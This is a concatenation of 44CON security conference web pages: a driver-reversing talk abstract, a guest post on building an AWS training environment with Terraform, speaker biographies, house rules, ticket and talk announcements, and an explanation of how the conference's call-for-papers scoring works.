          In this presentation, I will first do a quick recap on WDM drivers, its common structures, and how to identify its entry points. Then I’ll introduce KMDF with all its relevant functions for reverse engineering through a set of case-studies. I’ll describe how to interact with a KMDF device object through SetupDI api and how to find and analyze the different IO queues dispatch routines. Does the framework actually enhances security? We’ll come to a conclusion after revealing some major vendor implementation problems.
          Armed with this knowledge, you will be able to run your own bug hunting session over any KMDF driver.

           

          Also check our list of Workshops for 44CON 2018.

          %d bloggers like this:
          #####EOF##### Building a cloud security training platform – Pt 2: Infrastructure As Code – 44CON

          Building a cloud security training platform – Pt 2: Infrastructure As Code

          This is a guest post by one of our trainers, Paul Schwarzenberger. Paul is running the fantastic Cloud Security and DevSecOps training course this June. He also has a blog where he talks about AWS, Cloud Security and DevSecOps. This is part of a series on how he’s built a platform to make things easier for those attending his training. Part 1 is available here. Thanks, Paul!

          The Cloud Security and DevSecOps training course I’m delivering for 44CON in June includes AWS, Azure and GitHub accounts which the students use so they don’t need to create their own. As I described in my last blog post I also decided to build a training platform, so that students can connect to a virtual desktop in the cloud with all the software they need pre-installed.

          That way they can come on to the course with any laptop or even tablet which supports the Amazon WorkSpaces client.

          The next step after the proof of concept and design was to build it using as much automation as possible – to keep cost low, I wanted to easily destroy everything as soon as a course finished, and to rebuild just before starting the next one.

          I’m also taking the opportunity to demonstrate good security practice, and I’ll use the training environment as an example to show students during the course.

          An important security principle is segregation, so I decided to build the training environment in its own AWS account. But I didn’t want to have yet another monthly bill. So I used AWS Organizations to create the new account:

          That way, billing for all my AWS accounts is consolidated, and I can also use Service Control Policies to enforce security policies on the new account.

          The next step was to create the AWS Directory Service – this is an AWS managed Active Directory which I’ll use to manage user identities, for students to log on to their Amazon WorkSpaces virtual machines. I decided to use Terraform by Hashicorp, as it’s ideal for automating infrastructure as code:

          Here’s an example of the code snippet used to create the AWS Directory service:

          My terraform code included nearly all the required resources:

          • VPC, DMZ and private subnets in multiple availability zones, subnet routes
          • Network Address Translation (NAT) gateways and Internet gateway
          • Key and key alias in AWS Key Management Service
          • Virtual machine instance for Active Directory admin, security group and Elastic IP
          • Amazon Route 53 domain name for AD Admin virtual machine Elastic IP
          • Identity and Access Management (IAM) policy and role for AD admin virtual machine
          • AWS System Manager templates for domain join and Windows feature setup
          • Secrets in AWS Secret Manager for user passwords – more on this later

          The one exception is Amazon Workspaces, as these are not supported by Terraform at the time of writing.

          I typed “terraform apply” and about 30 minutes later the infrastructure was built in the new AWS account, and I could see all the resources in the portal. Here’s the AWS Directory service built from the code snippet above:

          After some troubleshooting, I succeeded in automating the domain join of the AD Admin Windows Server 2016 virtual machine, using an AWS Systems Manager document template. I also created some automation templates to set up the Windows feature for Active Directory administration tools, and to install the AWS PowerShell Module, so I could use these later.

          Then, I logged in to the AD admin virtual machine using Microsoft Remote Desktop with my domain admin credentials:

          Opening Active Directory Users and Computers, I could see the AWS Directory domain.

          All I needed now was some automation scripts to create users, and then build the Amazon Workspaces. I’ll cover these in my next post.

          #####EOF##### Ossz meg egy hivatkozást a Twitteren

          Ossz meg egy linket a követőiddel

          Új vagy a Twitteren?

          Légy minden pillanatban naprakész a barátaiddal, kedvenc hírességeiddel, különböző szakmai tekintélyekkel és a világon történő eseményekkel kapcsolatban!

          Mi az a Twitter? Tudj meg többet róla itt!.

          #####EOF##### 44CON 2017 Speakers – 44CON

          44CON 2017 Speakers

          Marc Newlin

          Marc newlin500Marc Newlin is a wireless security researcher at Bastille, where he discovered the MouseJack and KeySniffer vulnerabilities. A glutton for challenging side projects, he competed solo in two DARPA challenges, placing third in the DARPA Shredder Challenge, and second in the first tournament of the DARPA Spectrum Challenge.

          Matt Knight

          Matt+Knight

          Matt Knight is a software engineer and security researcher at Bastille, with a diverse background in hardware, software, and wireless security. In 2016, he exposed the internals of the closed-source LoRa PHY based on blind signal analysis. Matt holds a BE in Electrical Engineering from Dartmouth College.

          Nicky Bloor

          NickyBloor-ProfilePicture

          Always intrigued by how things work, Nicky wrote his first “Hello World” on a Commodore 64 in the early 90s. The video gaming hobby inherited from his father quickly turned into game hacking and amateur game development throughout his teenage years before later breaking into a career in infosec.

          Now a managing security consultant at NCC Group, Nicky jumps at the opportunity to take on interesting and mentally challenging projects involving reverse engineering, fuzzing, and code review whenever time allows around conducting security assessments for clients, hiking up mountains, and hanging from the occasional cliff.

          Follow Nicky on Twitter at @nickstadb

          Don Bailey

          Don A.Bailey

          Don A. Bailey has consistently engaged in ground breaking research over the past decade. He helped prove SS7 to be a global threat to telephony security before anyone knew what SS7 was, and helped mitigate these threats in the USA. Don started the IoT hacking trend by performing the first remote hack of a car at Black Hat Las Vegas in 2011. Mr. Bailey uncovered a critical flaw in a  compression algorithm so widely implemented that affected the entire Yahoo infrastructure, iOS, the Linux kernel, and even the Mars Rover. He is the first and possibly only researcher to have found critical bugs affecting the Erlang virtual machine core. He was the first security researcher to perform a security analysis of the RISC-V ISA.

          Mr. Bailey sits on the advisory board of several startups and conferences, assisting with technical guidance and strategy. He was the CTO of Revolar, a startup that helps vulnerable individuals improve their safety in uncertain physical environments. While launching his own IoT startup, Don consults regularly with startups of all sizes to secure their technology stack, network architecture, and embedded technologies.

          Don has given 9 talks at Black Hat Briefings, 5 talks at Hack In The Box, and 4 talks at the infamous 44Con conference, among others. His exploits have been featured on NPR, in Reuters, FOX, BBC, Al Jazeera, and many more stations worldwide.

          Klaus Schmeh

          Klaus-Schmeh-2

          Klaus Schmeh is the world’s leading blogger in the field of crypto history (www.schmeh.org). Klaus’ blog has become the most important online forum for unsolved encryptions and historical ciphers. Even the NSA has forwarded to him inquiries concerning encrypted documents.

          Klaus’ blog readers have proved extremely successful in breaking old cryptograms.

          Klaus Schmeh has published 14 books, 200 articles, 700 blog posts and 20 research papers  about encryption technology, which makes him the most-published cryptology author in the world. While he writes his blog in English, most other of his publications are in German.

          As his main profession of security consultant at the German company, cryptovision, Klaus utilizes his special skill in explaining complex technical topics, often using self-drawn cartoons and Lego brick models for visualization.

          Kev Sheldrake

          KevinSheldrake

          Kevin Sheldrake is a penetration tester who started working in the technical security field in 1997.

          Over the years, Kev has been a developer and systems administrator of ‘secure’ systems, an infosec policy consultant, a penetration tester, a reverse engineer and an entrepreneur who founded and ran his own security consulting company. His current interests (4+ years) are IoT, crypto and RFID; he reverse engineers and hacks devices that his employer intends to sell. He has a Masters degree, is a Chartered Engineer and, in the past, has been a CHECK Team Leader, a CISSP and held CLAS. He privately mentors others on the Stanford and Maryland crypto courses available on coursera.org.

          Kev has presented at EMF Camp, DEFCON 4420 and DEFCON 441452 on hacking embedded devices (Inside our Toys); presented on building debuggers for embedded devices at Securi-Tay (Phun with Ptrace()); and also presented a lengthy take down on the use of NLP in Social Engineering at DEFCON 4420 (Social Engineering LIES!). He has also presented regularly at his employer’s internal security conference, winning best talk in 2014 for ‘Embedded Nonsense’, a talk about hacking an IoT device and reversing its crypto, which he subsequently presented at Cyber Security Challenge.

          Jess Frazelle

          Jessica FrazelleJess Frazelle is a Software Engineer at Google. She has been a maintainer of Docker, contributor to RunC, Kubernetes and Golang as well as other projects. She loves all things involving Linux namespaces and cgroups and is probably most well known for running desktop applications in containers. She maintained the AppArmor, Seccomp, and SELinux bits in Docker and is quite familiar with locking down containers.

          Lars Haukli

          lars Haukli

          Lars Haukli was falsely accused of infecting his neighbour’s PC with a computer virus at the age of 12.

          For the past decade, he has been developing anti-malware technology to make amends for sins he never committed as a child.

          His current mission at Symantec is simple: Make the best sandbox the world has ever seen.

          David Mirza Ahmad

          David Mirza Ahmad gwxOR5RK_400x400

          David Mirza Ahmad is one of the founders of Subgraph and a Subgraph OS core developer. Prior to this he was the moderator of the Bugtraq mailing list, and was on the founding team of SecurityFocus. He was also a developer and maintainer of the Vega open source web security scanner. David works on low-level components of Subgraph OS: recently, this includes the seccomp-bpf wrapper for the sandbox, runtime profiler for policy generation, event monitor and notification system, TLS guard, and onion guard. David also manages the project and organization administration.

          Alex Plaskett

          alex plaskett

          Alex is Head of Technical Research at MWR InfoSecurity in the UK. Alex is best known for mobile and embedded vulnerability research and exploitation. Alex has previously presented at Deepsec, TROOPERS16, BlueHat, T2.Fi, Confidence, 44con and SyScan.

          James Loureiro

          Taken with Lumia Selfie

          James Loureiro is a senior researcher at MWR InfoSecurity, and has interests in vulnerability research and reverse engineering. James has previously presented on Windows Kernel fuzzing at DefCon in 2016 and on Adobe Reader in 2015.

          Matt Wixey

          matt_wixey

          Matt currently works as a penetration tester and researcher in the Threat and Vulnerability Management (TVM) team at PwC, and leads the team’s research capability. Prior to joining PwC, he worked in law enforcement, leading a technical R&D team. His research interests include antivirus and sandbox technologies, exploit development, and RF security.

          William Knowles

          William Knowles-Picture

          William Knowles is a Security Consultant at MWR InfoSecurity. He is primarily involved in purple team activities, which involves objective-based testing to simulate real-world threats, and helping organisations to identify effective defences to protect and detect against them. Prior to joining the industry and getting a real job, he completed a PhD in Computer Science at Lancaster University. His research interests include post-exploitation activities and offensive PowerShell.

          Yuriy Bulygin

          ybulygin_square

          Yuriy Bulygin (@c7zero) has been the chief threat researcher at Intel Security/McAfee and led the Advanced Threat Research team. Previously, Yuriy led the microprocessor vulnerability analysis team at Intel. Yuriy is the author of the open source CHIPSEC framework.

           

          Oleksandr Bazhaniuk

          Alex Bazhanluk

          Alex Bazhaniuk (@ABazhaniuk) is an independent security researcher. Previously, Alex was a member of the Advanced Threat Research and Security Center of Excellence teams at Intel and Intel Security. His primary interests are the security and exploitation of low-level hardware platforms and firmware, and binary analysis automation. His work has been presented at a number of security conferences. He is also a co-founder of DCUA, the first DEF CON group and CTF team in Ukraine.

          Nelson Murilo

          nmVB

          Nelson Murilo has been working at Cyber Analyst since 1992. He is the author of some security books in Portuguese and a regular contributor of Brazilian Computer Emergency Response Team. Nelson is the author of open source security tools like: chkrootkit – locally checks for the presence of a rootkit and Beholder – linux Wireless IDS. Nelson is a regular speaker in Brazil and international conferences such as Defcon, Thotcon, SAS Kaspersky, Ekoparty, MS Bluehat and Auscert.

          Graham Sutherland

          Graham Sutherland

          Graham is a pentester, electronics tinkerer, ex-developer, security researcher, reverse engineer, crypto enthusiast, promulgator of useless facts, vehement drunkard, and bacon aficionado. Can often be found scurrying towards a bar. One of his shoes is probably sentient.

          Collin Mulliner

          collin Mulliner

          Collin Mulliner is a security researcher and software engineer and spends most of his time working on mobile and smart phones. Collin is interested in vulnerability analysis and offensive security as he believes that in order to understand defense you first have to understand offense. Collin received a Ph.D. from the Technische Universitaet Berlin in 2011, and a M.S. and B.S. in computer science from UC Santa Barbara and FH-Darmstadt. Lately Collin switched his focus to the defensive side to work on mitigations and countermeasures. Collin co-authored The Android Hacker’s Handbook.

          Nikhil Mittal

          Nikhil Mittal Speaker Pic

          Nikhil Mittal is a hacker, infosec researcher, speaker and enthusiast. His area of interest includes penetration testing, attack research, defence strategies and post exploitation research. He has 8+ years of experience in Penetration Testing for his clients which include many global corporate giants. He is also a member of Red teams of selected clients.

          He specializes in assessing security risks at secure environments which require novel attack vectors and “out of the box” approach. He has worked extensively on using Human Interface Device in Penetration Tests and PowerShell for post exploitation. He is creator of Kautilya, a toolkit which makes it easy to use HIDs in penetration tests and Nishang, a post exploitation framework in PowerShell.

          In his spare time,Nikhil researches on new attack methodologies and updates his tools and frameworks. He blogs at http://www.labofapenetrationtester.com/

          Cedric Halbronn

          Cedric Halbronn

          Cedric (@saidelike) has joined NCC Group in 2015 and has been doing reverse engineering / exploit development for 8+ years. His current interests are memory corruption bugs in browsers, kernels, mobile devices, embedded devices, etc.

          Gabriel Ryan

          Gabriel Ryan - Profile Picture

          Gabriel Ryan (Twitter: @s0lst1c3) is a penetration tester and researcher with a passion for wireless and infrastructure testing. His career began as a systems programmer at Rutgers University, where he assessed, diagnosed, and resolved system and application issues for a user community of over 70,000 faculty, students, and staff. Gabriel then went on to work as a penetration tester and researcher for the Virginia-based defense contractor OGSystems. While at OGSystems, he worked as a lead engineer on the Mosquito project, a geospatial intelligence tool that leverages wireless technology to track potential threats.

          Gabriel currently works for the international security consulting firm Gotham Digital Science at their New York office, where he performs full scope red team penetration tests for a diverse range of clients. He also contributes heavily to his company’s research division, GDS Labs. Some of his most recent work includes a whitepaper on rogue access point detection, along with the popular tool Eaphammer, which is used for breaching WPA2-EAP networks. On the side, he serves as a member of the BSides Las Vegas senior staff, coordinating wireless security for the event. In his spare time, he enjoys live music, exploring the outdoors, and riding motorcycles.

          Olivier Bilodeau

          olivier bilodeauOlivier Bilodeau is leading the Cybersecurity Research team at GoSecure. With more than 10 years of infosec experience, Olivier managed large networks and server farms, wrote open source network access control software and recently worked as a Malware Researcher. Passionate communicator, Olivier has spoken at several conferences like Defcon, Botconf, SecTor, Derbycon and many more. Invested in his community, he coorganizes MontréHack — a monthly workshop focused on applied information security through capture-the-flag challenges —, he is in charge of NorthSec’s training sessions and is hosting NorthSec’s Hacker Jeopardy. His primary research interests include reverse engineering tools, Linux and/or embedded malware and honeypots. To relax, he likes to participate in information security capture-the-flag competitions, work on various opensource projects and brew his own beer.

          Ruben Boonen

          Ruben BonnenMy name is Ruben Boonen (@FuzzySec), I have been working in InfoSec since 2012. I have a well-rounded skill set, having taken on many application, infrastructure and bespoke engagements. I have however developed a special interest for Windows: Domains, exploit development, client-side attacks, restricted environments, privilege escalation, persistence, post-exploitation and of course PowerShell!

          I love breaking stuff but it is equally important to me to share that knowledge with the wider community. I have previously been a trainer at Black Hat, Def Con and various BSides events in the UK. Additionally, I maintain a InfoSec blog (http://www.fuzzysecurity.com/) and GitHub account (https://github.com/FuzzySecurity) where I publish research on a variety of topics!

           

          Didier Stevens

          Didier StevensDidier Stevens (Microsoft MVP, SANS ISC Handler, Wireshark Certified Network Analyst, CISSP, GSSP-C, GCIA, GREM, MCSD .NET, MCSE/Security, MCITP Windows Server 2008, RHCT, CCNP Security, OSWP) is a Senior Security Analyst (NVISO https://www.nviso.be). You can find his open source security tools on his IT security related blog at https://blog.DidierStevens.com.

          Saumil Shah

          saumil_photo_squareCEO, Net-Square    @therealsaumil

          Saumil Shah, is the founder and CEO of Net-Square, providing cutting edge information security services to clients worldwide. Saumil is an internationally recognized conference speaker and instructor for over 18 years. He is also the co-developer of the wildly successful “Exploit Laboratory” courses and authored two books titled “Web Hacking: Attacks and Defense” and “The Anti-Virus Book”.

          Saumil holds an M.S. in Computer Science from Purdue University, USA and a B.E. in Computer Engineering from Gujarat University. He spends his leisure time playing Pacman, flying kites, traveling around the world and taking pictures.

          James Forshaw

          No Image for personJames is a security researcher in Google’s Project Zero. He has been involved with computer hardware and software security for over 10 years looking at a range of different platforms and applications. With a great interest in logical vulnerabilities he’s been listed as the #1 researcher for MSRC, as well as being a Pwn2Own and Microsoft Mitigation Bypass bounty winner. He has spoken at a number of security conferences including Black Hat USA, CanSecWest, Bluehat, HITB, and Infiltrate.

          Daniel Crowley

          Daniel CrowleyDaniel Crowley is a Senior Security Engineer and Regional Research Director for NCC Group Austin, tasked with finding and exploiting flaws in everything from Web applications and cryptosystems to ATMs, smart homes, and industrial control systems. He denies all allegations of unicorn smuggling and questions your character for even suggesting it. He has been working in information security since 2004. Daniel is TIME’s 2006 Person of the Year. He has developed and released various free security tools such as MCIR, a powerful Web application exploitation training and research platform, and FeatherDuster, an automated modular cryptanalysis tool. He does his own charcuterie and brews his own beer. He is a frequent speaker at conferences including Black Hat, DEFCON, Shmoocon, Chaos Communications Camp, and SOURCE. Daniel can open a door lock with his computer but still can’t launch ICBMs by whistling into a phone. He has been interviewed by various print and television media including Forbes, CNN, and the Wall Street Journal. He holds the noble title of Baron in the micronation of Sealand. His work has been included in books and college courses.

          Amanda Rousseau

          Amanda RousseauAmanda absolutely loves malware. She works as a Senior Malware Researcher at Endgame on the threat research team focusing in dynamic behavior detection both on Windows and OSX platforms. Prior to Endgame, she worked as a malware researcher at FireEye, malware reverse engineer in commercial DFIR, and malware reverse engineer in the U.S. Department of Defense.

          You can follow her on Twitter @malwareunicorn

          Aaron Guzman

          AaronGuzmanAaron Guzman is a Manager with Gotham Digital Science (GDS), located in Los Angeles, CA. Mr. Guzman previously worked with established tech companies such as Belkin, Linksys, Symantec and Dell SecureWorks breaking code and architecting infrastructures. Aaron has spoken at a number of conferences worldwide which include DEF CON, OWASP AppSec EU, OWASP AppSec USA, HackFest, Security Fest, HackMiami, AusCERT as well as a number of BSides events. Aaron leads the OWASP Embedded Application Security project; providing practical guidance to address the most common firmware security bugs to the embedded and IoT community. Furthermore, Aaron is a Chapter leader for the Open Web Application Security Project (OWASP) Los Angeles, Cloud Security Alliance SoCal (CSA SoCal), and a Technical Editor for Packt Publishing. He has contributed to many IoT security guidance publications from CSA, OWASP, Prpl, and others. Follow Aaron’s latest research on Twitter at @scriptingxss

           

          #####EOF##### Introducing 44CON’s House Rules – 44CON

          Introducing 44CON’s House Rules

          44CON was born out of a private event that Adrian and I used to occasionally get involved in organising. It was a close-knit group of people featuring deeply opinionated and often spectacularly drunk people who somehow mostly got along.

          As 44CON grew, more people outside that group attended. The new people didn’t know about our overton window. These people paid good money for a good time, but were new to our community and we hadn’t provided guidance on what was acceptable behaviour, or how we handle concerns.

          An event with talks about exploiting human and computer trust relationships tends towards some attendees holding unusual views about acceptable behaviour. To make things easier for everyone, we introduced Wheaton’s Law. For those that don’t know, it’s fairly easy to take on board:

          “Don’t be a dick.”

          For a long time “Don’t be a dick” was the only rule we had. Every year we’d review it, and every year it would stay.

          We have had people breach the rule. We’ve had and investigated complaints. We stand by Wheaton’s law as it’s stood by us. What we haven’t done is properly track complaint resolution, and we hadn’t told people how to raise concerns. That’s why we’ve launched our House Rules. They’re not going to be perfect, but it’s a start.

          The House Rules are simply an expansion of Wheaton’s Law. They set expectations, a reporting process and circumstances under which we’ll eject someone, along with a reminder that the laws of England and Wales may not match your own at home.

          We’ve integrated feedback from event organisers up and down the country, and we’re fully open to suggestions on how to improve them for next year. To be clear, there’s no change in our expectations from previous years, only in how we communicate them.

          If you’re coming to 44CON you’ll see the house rules in your brochure or you can read them now. Please take a moment to read them, as they apply to everyone. If you have any questions, suggestions or comments, use the email address on the House rules page before the event, or follow the procedure to report a concern once you’re there.

          We want everyone to have a good time, regardless of preferred text editor, open source licensing beliefs or i/o port configuration. We hope you’ll join us and keep making 44CON a great place for everyone.

          #####EOF##### 44CON 2019 Early-Bird Tickets are now on sale – 44CON

          44CON 2019 Early-Bird Tickets are now on sale

          Our 2019 Early bird tickets are now on sale. There are 50 early bird tickets available until March 11th. Once they’re gone, they’re gone. As usual, the early-bird prices still start at £299 inc. VAT, but there are also accommodation and t-shirt options available.

          We’re trialling a small selection of cheap expo tickets providing limited event access with certain groups, and there will be pre-registered free evening event tickets. Early bird tickets are the cheapest fully catered, full access tickets you can get. If you want to see the talks, you want one of these.

          As well as full access to 44CON, Early bird ticket holders can also ask for an invite to our 44CONnect event in London on the 13th of March. This invite-only event will take place the day before CRESTCon, and will feature talks from some of the trainers taking part in our quarterly training programme. Please make sure you mention 44CONnect on your booking, or contact us after booking if you’d like to come.

          Book your tickets in our shop. If you’d like to book in bulk or through your employer, contact us to arrange an invoice.

          #####EOF##### DSC_4836-1 – 44CON

          DSC_4836-1

          #####EOF##### Facebook
          Log into your Facebook account to share.
          Neues Konto erstellen
          #####EOF##### 44CON Talks and Workshops announced – 44CON

          44CON Talks and Workshops announced

          Our CFP process has completed and we’re now putting talks and workshops up. We still have a few more to add, but there’s enough up to start checking out. So, what are we covering this year?This year’s talks are a heady mix of blue, red and purple team talks covering everything from bug bounties to hardware hacking, careers to cryptography and machine learning to mPoS. As always, expect to go from zero to hero, and get yer mind bent along the way. Here’s some of the talks we’re really looking forward to seeing.

          [NEW] They’re All Scorpions – Successful SecOps in a Hostile Workplace by Pete Herzog

          This talk looks at how we can shift our approach to SecOps to be (more) effective in places where it feels like nobody’s listening. Pete is a battle-scarred veteran of the world of information security, and doesn’t shy away from asking (and answering) the difficult questions.

          [NEW] Catch Me If You Can: Ephemeral Vulnerabilities in Bug Bounties by Shubham Shah and Michael Gianarakis

          Bug bounties are an industry hot topic, with many people finding it hard to get in due to automation. Shubs and Mike are coming all the way from Australia to talk to us about ephemeral vulnerabilities: vulnerabilities that may pop up and disappear after short periods of time. They’ll share their secrets on industrializing bug bounty hunting, and we’ve been working with our sponsors Bugcrowd to come up with a 44CON-exclusive bug bounty to help you get started. This is a great talk for those looking to get into bug bounties, and also for those defending Internet-facing services with dynamically scaling architectures. This talk may feature some of the 300 bugs these guys have found over the past few years, but sadly it would not be possible to fit them all into a 45 minute slot.

          [UPDATED] For the Love of Money: Finding and exploiting vulnerabilities in mobile point of sales systems by Leigh-Anne Galloway and Tim Yunusov

          Ever make a payment using a mobile Point of Sale (mPoS) system such as square or iZettle? You know, the ones with the things that plug into some random person’s compromised phone that you use to make payments.

          It turns out that some mPoS systems are not as secure as people thought they were.

          It turns out that attacking some of these things isn’t hard.

          It turns out that the cost of tampering with some of these things is about £8.

          What could possibly go wrong?

          [NEW] Weak analogies make poor realities – are we sitting on a Security Debt Crisis? By Charl van der Walt

          Security is often framed in terms of risk, and we often back up our decisions with analogies. But are we genuinely using analogies correctly, or are we simply cherry picking to justify risk decisions? In this talk, Charl looks at our approach to analogies and risk management, and explores and compares the use of security debt as a decision-making tool.

          Charl also has an incredible workshop on deploying Microsoft’s Sysmon to help detect and defend against bad things on your networks. In itself, this is a great example of using security debt as a way of measuring investment in existing tools and people over buying new shiny boxes.

          Tickets are still available from our shop. Which talks and workshops are you looking forward to? Don’t forget to let us know on twitter!

          #####EOF##### 44CON 2018 – Page 2 – 44CON

          CRESTCon & IISP Congress 2018

          44CON is exhibiting at CRESTCon & IISP Congress on 3rd May at theRoyal College of Physicians in London. Tickets are available now – www.crestandiisp.com. 

          Now in its sixth year, CRESTCon and IISP Congress is a unique event that brings together leading technical and business information security professionals and is a key date in the industry calendar, attracting an impressive line-up of speakers and senior delegates.

          This year it also welcomes the BCS Security Conference in the third stream. 2017’s event welcomed over 450 delegates, had three conference streams, a bookshop/meeting area, as well as expanded exhibition and demo areas and 2018 is building further on the success of these features. The length of the day is being increased to incorporate further networking and entertainment in response to the feedback received from delegates and sponsors.

          Delegates at the event include senior security, risk and compliance managers from a wide range of public and private sector organisations, along with security consultants and business directors working in the technical information assurance and response industry.

          If you’re attending, please stop by and say hello to Steve and Marizel!

          CRESTCon & IISP Congress 2018

          44CON is exhibiting at CRESTCon & IISP Congress on 3rd May at theRoyal College of Physicians in London. Tickets are available now – www.crestandiisp.com. 

          Now in its sixth year, CRESTCon and IISP Congress is a unique event that brings together leading technical and business information security professionals and is a key date in the industry calendar, attracting an impressive line-up of speakers and senior delegates.

          This year it also welcomes the BCS Security Conference in the third stream. 2017’s event welcomed over 450 delegates, had three conference streams, a bookshop/meeting area, as well as expanded exhibition and demo areas and 2018 is building further on the success of these features. The length of the day is being increased to incorporate further networking and entertainment in response to the feedback received from delegates and sponsors.

          Delegates at the event include senior security, risk and compliance managers from a wide range of public and private sector organisations, along with security consultants and business directors working in the technical information assurance and response industry.

          If you’re attending, please stop by and say hello to Steve and Marizel!

          44CON 2018 CFP Is Open!

          We’re really excited to open our Call For Papers for 44CON 2018. We’re looking forward to seeing all of your submissions on our shiny new CFP system, which promises to be far less painful than the old one.

          44CON consists of 2 dedicated speaking tracks, a dedicated workshop track and combined speaking/workshop track over the two days. Talks range from softer subjects in areas such as governance, law and policy through to reverse engineering, exploitation, tooling and abuse of weird machines. We also have an open evening freely accessible to all (but with pre-registration) on the Wednesday evening before the main event.

          Talks are 45 minutes long, while workshops are 60-120 minutes in length. All submissions are welcome but some useful guidance on particular topics of interest can be found at the CFP submission system.

          As usual, speakers from outside of Fulham, Putney or London Underground Zone 1 will have travel reimbursed. We’ll provide two nights accommodation for speakers or workshop presenters with more than an hour’s travel to a mainline London rail station. We’ll bump that to 3 nights accommodation for any accepted speaker providing a talk and a workshop.

          If you’re interested in submitting something, we highly recommend reading last year’s How To Game The 44CON CFP blog post.

          The CFP closes on Monday 30th April 2018 at 23:59pm UTC. We’ll start notifying speakers by the 4th of June and announce our first round of accepted speakers on the 6th of June at BSides London. Full details of dates can be found on the CFP system.

          #####EOF##### How to game the 44CON CFP – 44CON

          How to game the 44CON CFP

          Every year 44CON has a Call For Papers (CFP). The CFP is run by a panel of about 10 people from various parts of the industry, predominantly based in the UK. The process and technologies used have changed over the years, most notably last year when we replaced our existing bespoke CFP system with HotCRP and implemented a weighted average scoring mechanism based on HotCRP voting results.

          TL;DR – I want to speak at 44CON

          Ok, then do these things to boost your chances:

          1. Submit a workshop with your talk
          2. Make it clear where else you’ve submitted and/or might/will submit
          3. Include links to other talks you’ve done, video if you have it
          4. Get your talk in early for a better chance of scoring higher
          5. Be enthusiastic, tell us of any boundaries, problems or needs, and work with us, not against us

          Understanding how the CFP works

          The CFP is opened on a particular date for submissions. Everyone speaking in Track 1 or 2 must go through the CFP process. Track 3 (which is sometimes used for workshops) is a little more fluid, for reasons I’ll discuss later.

          Scoring and voting

          A gypsy fortune teller brings her crystal ball to life to read the future.
          Scoring is as much an art as science, but you can improve your chances of speaking at 44CON.

          Our panel votes on and scores talks out of 5, normally in several tranches. It varies by individual and not everyone votes on every talk. People provide comments and feedback, which we pass onto those submitting on request. On average we get between 200-400 submissions a year.

          When the CFP is due to close, we push panel members along to review and score submissions, particularly if they haven’t yet been voted on.

          Once voting is complete, we divide the sum of scores from each voter by the number of voters to get an average, with an option for discussion under certain circumstances that can weight a score by up to + or – 0.5.

          UK submissions normally get up-voted (with some exceptions, see below), and in the selection rounds there’s a strong bias towards UK-based speakers over non-UK-based speakers with identical scores, unless the non-UK-based speaker’s talk is exceptional in other ways. This doesn’t mean that your talk will be rejected if you’re not based in or from the UK. Non-UK based speakers make up the majority of our speakers, but there is definitely a small “home bias” amongst the panel members based in the UK.

          Why does it take so long to find out if I’m accepted?

          If you're not sure what's happening, contact us and we'll give you an update.
          If you’re not sure what’s happening, contact us and we’ll give you an update.

          Once we have the results we look to fill a specific number of slots, which varies each year. Acceptance messages are sent out in tranches, and when people return the speaker agreement, they’re confirmed. We normally send rejections for very low scoring talks, but there’s a glut of talks usually falling between 3.5-4.0, where they might be accepted if others scoring higher can’t make it.

          If you’ve scored an average of 5.0, you’re pretty much guaranteed a slot and we’ll get in touch straight away. The bulk of submissions tend to hover around a score of 3-4, and 4.5 is normally the cut-off point for the first tranche of accepts. We then wait till the first tranche come back, or if we get no response, chase them up twice before moving on.

          For the slots that free up, we move down the list, ensuring those who scored highest get picked first. Once we’ve filled up tracks 1 and 2, we move on to track 3.

          After the first round of talk triage, cut-off tends to happen around average scores of 4.25 – 4.0/5.What this means is that there are a lot of good talks that just don’t get accepted at 44CON because we don’t have the space to support them, even with a third track. More often than not a talk or workshop rejection from 44CON does not mean it sucks. Ask for feedback and we’ll share what we can.

          Wait, isn’t 44CON a two-track conference?

          All speakers dress like this when preparing submissions.
          All speakers dress like this when preparing submissions.

          Yes and no. For several years we’ve run a hidden track under various names. This is because we’ve wanted to give our backup speakers a chance to speak if someone drops out, but we don’t want to risk slots emptying on the main tracks. Inevitably people drop out along the way, people who are allocated to track 3 move onto the main tracks and this leaves gaps that we have the option to fill.

          Sometimes we’ll look back at the talks list and look to offer a spot to someone on the list, however sometimes it’s easier to go to people we know are definitely coming and see if they have something. This is a completely arbitrary decision affecting two slots a year at most, and more often than not, 10-20 people want the slots. We generally operate on a first come, first serve basis.

          Hacking the process

          Now you know how the process works, let’s look at how you can subvert it to ensure your talk has the best chance of scoring high. Each voter on the panel is different, but there are certain things that, on average, will result in you being more favourably considered.

          Submit both Talks and Workshops

          We have 2-3 tracks to fill with talks, and get on average 200-400 submissions a year. We get less than 20 workshop submissions a year. Workshops are 2 hours long and come with an extra night’s accommodation when talks are also submitted.

          If you want to maximise your chances of speaking at 44CON, submit a workshop.

          Workshops are typically more intimate affairs with room for about 30-50 people sitting down, although we have had workshops with 100 people. If you’re not sure what to do in a workshop, imagine that if your main talk is about the theory, try a play-along walkthrough on how to do this in practice.

          Every year we’ve run a formal CFP process, we’ve treated people who submit workshops far more favourably than people who submit talks alone. Even if your workshop is unrelated to your talk, both are likely to be up-voted considerably.

          I cannot stress this enough. If you want to maximise your chances of speaking at 44CON, submit a workshop.

          This only works if you submit your workshop separately to your talk. People submitting a talk and workshop in one don’t get the voting benefit separate talk and workshop submissions do. Finally, if you’re only prepared to come if your talk is accepted, please say so on both submissions.

          Tell us where else your talk has been submitted

          44CON is usually among the first events in the calendar after BlackHat and DefCon. Everyone wants to speak in Vegas, we understand that. Some people score BlackHat and DefCon talks slightly lower in order to give preference to newer talks, some don’t. It’s down to the panel. If you don’t tell us you’re talking at BlackHat or Defcon, and we find out by checking the site, panel members will remember next year and it may affect future submissions.

          If you’re doing your reveal in Vegas, focus on your process at 44CON.

          Not everyone in the UK can go to BlackHat or Defcon, so there’s not a massive deal in your talk being done in the UK afterwards. We do need to know what will be different. It takes a lot of effort to deliver a big Vegas talk, and making something different may seem like an awful lot of effort, but there’s an easy workaround that normally gets big bounces.

          If you’re doing your reveal in Vegas, focus on your process at 44CON. If you spent 6 months trying to reverse engineer and compile code for an arcane architecture, we want to know how you went about it. We also appreciate failures as much as successes. Some of our better talks have been talks about how people have failed and what they learned.

          If your talk is 70% different to your Vegas talk, say so. If it’s 50%, say so. If it’s 30%, say so. If you say so, and it’s not, then reviewers will know next year.

          Show us your other talks

          A picture speaks a thousand words, but a video of your talk lets the panel look at the type of speaker you are, how you approach your talks, and gives us an idea of where we think you might fit in best.

          Show us your other talks, even if you're a rockstar.
          Showing us your other talks helps us fit you in.

